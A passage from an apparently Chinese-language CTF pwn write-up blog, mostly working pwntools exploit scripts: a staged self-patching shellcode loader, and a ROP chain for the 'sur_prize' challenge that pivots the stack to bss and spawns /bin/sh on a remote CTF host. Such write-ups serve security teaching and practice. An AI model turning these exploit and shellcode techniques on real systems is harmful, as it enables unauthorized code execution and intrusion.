late_chunk<span class="token punctuation">,</span> _ <span class="token operator">=</span> emit_push_imm8<span class="token punctuation">(</span>cur_al<span class="token punctuation">,</span> <span class="token number">0x00</span><span class="token punctuation">)</span>
late <span class="token operator">+=</span> late_chunk
late_chunk<span class="token punctuation">,</span> _ <span class="token operator">=</span> emit_pop<span class="token punctuation">(</span>cur_al<span class="token punctuation">,</span> <span class="token number">0x80</span><span class="token punctuation">,</span> post_al<span class="token operator">=</span><span class="token number">0x00</span><span class="token punctuation">)</span> <span class="token comment"># rax有异，0x80刚好可以拼成pop rax</span>
late <span class="token operator">+=</span> late_chunk

<span class="token comment"># 选择一个允许的 disp，让 patch 指向 syscall 占位符的第一个字节</span>
<span class="token comment"># patch 指令长度 6，目标 = patch_next_rip + disp</span>
<span class="token comment"># 这里令 disp = padding + len(late)</span>
disp <span class="token operator">=</span> pick_disp_at_least<span class="token punctuation">(</span><span class="token builtin">len</span><span class="token punctuation">(</span>late<span class="token punctuation">)</span><span class="token punctuation">)</span>
padding <span class="token operator">=</span> disp <span class="token operator">-</span> <span class="token builtin">len</span><span class="token punctuation">(</span>late<span class="token punctuation">)</span>

<span class="token comment"># add byte ptr [rip+disp], al  (disp32 = disp)</span>
stage1 <span class="token operator">+=</span> <span class="token string">b"\x00\x05"</span> <span class="token operator">+</span> p32<span class="token punctuation">(</span>disp<span class="token punctuation">)</span>

<span class="token comment"># padding（不改寄存器）</span>
stage1 <span class="token operator">+=</span> <span class="token string">b"\x90"</span> <span class="token operator">*</span> padding

<span class="token comment"># rax=0，然后紧接着执行被 patch 的 syscall（read）</span>
stage1 <span class="token operator">+=</span> late

<span class="token comment"># syscall 占位符（会被上面的 patch 从 0d05 变成 0f05）</span>
stage1 <span class="token operator">+=</span> <span class="token string">b"\x0D\x05"</span>

<span class="token comment"># syscall 返回后：RAX == 实际读到的字节数（我们确保等于 READ_N）</span>
cur_al <span class="token operator">=</span> READ_N

<span class="token comment"># ret：栈顶在进入 shellcode 时就是 rbx，所以 ret 会跳到 rbx（stage2）</span>
chunk<span class="token punctuation">,</span> cur_al <span class="token operator">=</span> emit_exec_opcode<span class="token punctuation">(</span>cur_al<span class="token punctuation">,</span> <span class="token number">0xC3</span><span class="token punctuation">)</span>
stage1 <span class="token operator">+=</span> chunk
<span class="token comment">#gdb.attach(p)</span>
p<span class="token punctuation">.</span>send<span class="token punctuation">(</span>stage1<span class="token punctuation">)</span>

p<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b"[+]"</span><span class="token punctuation">)</span>

stage2 <span class="token operator">=</span> <span class="token string">b"\x90"</span> <span class="token operator">*</span> <span class="token number">0x20</span> <span class="token operator">+</span> asm<span class="token punctuation">(</span>shellcraft<span class="token punctuation">.</span>sh<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token keyword">if</span> <span class="token builtin">len</span><span class="token punctuation">(</span>stage2<span class="token punctuation">)</span> <span class="token operator">></span> READ_N<span class="token punctuation">:</span>
    <span class="token keyword">raise</span> ValueError<span class="token punctuation">(</span><span class="token string-interpolation"><span class="token string">f"stage2 too long: </span><span class="token interpolation"><span class="token punctuation">&#123;</span><span class="token builtin">len</span><span class="token punctuation">(</span>stage2<span class="token punctuation">)</span><span class="token punctuation">&#125;</span></span><span class="token string"> > </span><span class="token interpolation"><span class="token punctuation">&#123;</span>READ_N<span class="token punctuation">&#125;</span></span><span class="token string">"</span></span><span class="token punctuation">)</span>
stage2 <span class="token operator">=</span> stage2<span class="token punctuation">.</span>ljust<span class="token punctuation">(</span>READ_N<span class="token punctuation">,</span> <span class="token string">b"\x90"</span><span class="token punctuation">)</span>

p<span class="token punctuation">.</span>send<span class="token punctuation">(</span>stage2<span class="token punctuation">)</span>
p<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h2 id="sur-prize">sur_prize</h2>
<p>莫名奇妙的一道题，输入的第一个地址就覆盖了返回地址，导致无法设置rbp，栈迁移打不出来</p>
<p>虽然可以用pop rbp设置，但是输入函数居然是rsp寻址，而两个指令执行函数都是rbp寻址，这导致把rbp改到bss段之后没法往上任意写</p>
<p>发现直接跳转到0x401100处执行printf，恰好输出0字节，rax为0，然后跳转到一个借助rbp设置寄存器的syscall ret完成bss段任意写就好了</p>
<p>感觉printf这么用很莫名奇妙，这真是预期解吗</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span>

context<span class="token punctuation">(</span>arch<span class="token operator">=</span><span class="token string">"amd64"</span><span class="token punctuation">,</span> os<span class="token operator">=</span><span class="token string">"linux"</span><span class="token punctuation">,</span> log_level<span class="token operator">=</span><span class="token string">"debug"</span><span class="token punctuation">,</span> terminal<span class="token operator">=</span><span class="token punctuation">[</span><span class="token string">"tmux"</span><span class="token punctuation">,</span> <span class="token string">"splitw"</span><span class="token punctuation">,</span> <span class="token string">"-h"</span><span class="token punctuation">]</span><span class="token punctuation">)</span>

<span class="token comment">#p = process("./vuln")</span>
p <span class="token operator">=</span> remote<span class="token punctuation">(</span><span class="token string">"nc1.ctfplus.cn"</span><span class="token punctuation">,</span> <span class="token number">13092</span><span class="token punctuation">)</span>
time<span class="token punctuation">.</span>sleep<span class="token punctuation">(</span><span class="token number">3</span><span class="token punctuation">)</span>

bin_ls <span class="token operator">=</span> <span class="token number">0x401657</span> 
bin_cat <span class="token operator">=</span> <span class="token number">0x004016A2</span> 
bss_addr <span class="token operator">=</span> <span class="token number">0x0404000</span> <span class="token operator">+</span> <span class="token number">0x800</span>
leave_ret <span class="token operator">=</span> <span class="token number">0x00401399</span>
gets_addr <span class="token operator">=</span> <span class="token number">0x40174F</span>
pop_rbp <span class="token operator">=</span> <span class="token number">0x00040125d</span>
printf <span class="token operator">=</span> <span class="token number">0x00401100</span>
sys1 <span class="token operator">=</span> <span class="token number">0x00000040168e</span>
sys <span class="token operator">=</span> <span class="token number">0x000000401689</span>
syscall <span class="token operator">=</span> <span class="token number">0x0040169D</span> 
add_rsp_ret <span class="token operator">=</span> <span class="token number">0x000401016</span>
printf_addr <span class="token operator">=</span> <span class="token number">0x004015DE</span>  
ret <span class="token operator">=</span> <span class="token number">0x040101a</span>
bin_sh <span class="token operator">=</span> bss_addr <span class="token operator">+</span> <span class="token number">0x68</span>

p<span class="token punctuation">.</span>send<span class="token punctuation">(</span><span class="token string">b"a"</span><span class="token punctuation">)</span>
time<span class="token punctuation">.</span>sleep<span class="token punctuation">(</span><span class="token number">0.5</span><span class="token punctuation">)</span>

<span class="token comment"># 栈迁移</span>
payload <span class="token operator">=</span> <span class="token string">b""</span>
<span class="token comment">#payload += p64(leave_ret)</span>
payload <span class="token operator">+=</span> p64<span class="token punctuation">(</span>pop_rbp<span class="token punctuation">)</span>
payload <span class="token operator">+=</span> p64<span class="token punctuation">(</span>bss_addr<span class="token punctuation">)</span>
payload <span class="token operator">+=</span> p64<span class="token punctuation">(</span>ret<span class="token punctuation">)</span>
<span class="token comment">#payload += p64(bss_addr)</span>
payload <span class="token operator">+=</span> p64<span class="token punctuation">(</span>printf<span class="token punctuation">)</span> <span class="token comment">#什么也不输出，然后把rax设置为0</span>
<span class="token comment">#payload += p64(printf_addr) </span>
payload <span class="token operator">+=</span> p64<span class="token punctuation">(</span>sys1<span class="token punctuation">)</span>
payload <span class="token operator">+=</span> p64<span class="token punctuation">(</span>sys<span class="token punctuation">)</span>
payload <span class="token operator">+=</span> p64<span class="token punctuation">(</span>pop_rbp<span class="token punctuation">)</span>
payload <span class="token operator">+=</span> p64<span class="token punctuation">(</span>bss_addr <span class="token operator">+</span> <span class="token number">0x20</span><span class="token punctuation">)</span>
payload <span class="token operator">+=</span> p64<span class="token punctuation">(</span>sys<span class="token punctuation">)</span>
p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>payload<span class="token punctuation">)</span>

<span class="token comment"># get shell，懒得定位最后会落到哪个bin_sh上遂多复制了几个</span>
p2 <span class="token operator">=</span> <span class="token string">b""</span> 
p2 <span class="token operator">+=</span> p64<span class="token punctuation">(</span>pop_rbp<span class="token punctuation">)</span>
p2 <span class="token operator">+=</span> p64<span class="token punctuation">(</span>bss_addr<span class="token punctuation">)</span>
p2 <span class="token operator">+=</span> p64<span class="token punctuation">(</span>sys<span class="token punctuation">)</span>
p2 <span class="token operator">+=</span> p64<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span>
p2 <span class="token operator">+=</span> p64<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span>
p2 <span class="token operator">+=</span> p64<span class="token punctuation">(</span>bin_sh<span class="token punctuation">)</span>
p2 <span class="token operator">+=</span> p64<span class="token punctuation">(</span>bin_sh<span class="token punctuation">)</span>
p2 <span class="token operator">+=</span> p64<span class="token punctuation">(</span>bin_sh<span class="token punctuation">)</span>
p2 <span class="token operator">+=</span> p64<span class="token punctuation">(</span>bin_sh<span class="token punctuation">)</span>
p2 <span class="token operator">+=</span> p64<span class="token punctuation">(</span>bin_sh<span class="token punctuation">)</span>
p2 <span class="token operator">+=</span> p64<span class="token punctuation">(</span>bin_sh<span class="token punctuation">)</span>
p2 <span class="token operator">+=</span> p64<span class="token punctuation">(</span>bin_sh<span class="token punctuation">)</span>
p2 <span class="token operator">+=</span> p64<span class="token punctuation">(</span>bin_sh<span class="token punctuation">)</span>
p2 <span class="token operator">+=</span> p64<span class="token punctuation">(</span>bin_sh<span class="token punctuation">)</span>
p2 <span class="token operator">+=</span> p64<span class="token punctuation">(</span>bin_sh<span class="token punctuation">)</span>
p2 <span class="token operator">+=</span> p64<span class="token punctuation">(</span>bin_sh<span class="token punctuation">)</span>
p2 <span class="token operator">+=</span> p64<span class="token punctuation">(</span>bin_sh<span class="token punctuation">)</span>
p2 <span class="token operator">+=</span> <span class="token string">b"/bin/sh\x00"</span>
<span class="token comment">#gdb.attach(p)</span>

time<span class="token punctuation">.</span>sleep<span class="token punctuation">(</span><span class="token number">0.5</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>p2<span class="token punctuation">)</span>

p<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
</div>

      
        <div class="article-tags">
          <a href="/tags/pwn/"># pwn</a>
        </div>
      

      <nav class="post-nav" aria-label="相邻文章">
        <a class="post-nav-item prev" href="/2026/03/14/Compendium_Adding-eBPF-for-Kernel-Level-Visibility/"><span>上一篇</span><strong>Compendium Adding eBPF for Kernel-Level Visibility</strong></a>
        <a class="post-nav-item next" href="/2026/01/18/tauri-2-%E8%87%AA%E5%8A%A8%E6%9B%B4%E6%96%B0/"><span>下一篇</span><strong>tauri-2 自动更新</strong></a>
      </nav>

      
        <section class="post-comments" aria-label="评论区">
          <div id="byr-comments"></div>
          <script async src="https://comments.byr.pub/embed.js" data-site="YUpHFyDrO3w"></script>
        </section>
      
    </div>

    <aside class="post-toc" id="post-toc" aria-label="文章目录" hidden>
      <div class="post-toc-inner">
        <header><span>ON THIS PAGE</span><strong id="post-toc-count">00</strong></header>
        <nav class="post-toc-nav" id="post-toc-nav"></nav>
        <div class="post-toc-progress"><i id="post-toc-progress"></i></div>
      </div>
    </aside>
  </div>
</article>

    </main>

    <footer class="site-footer">
  <div class="footer-inner">
    <div>
      © 2025–2026
      Auceptin
    </div>
    <div>Built with Hexo · Paradise Lost</div>
  </div>
</footer>

    <button class="back-to-top" id="back-to-top" type="button" aria-label="返回顶部">↑</button>
    <script src="/js/theme.js"></script>
    
      <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    
  </body>
</html>
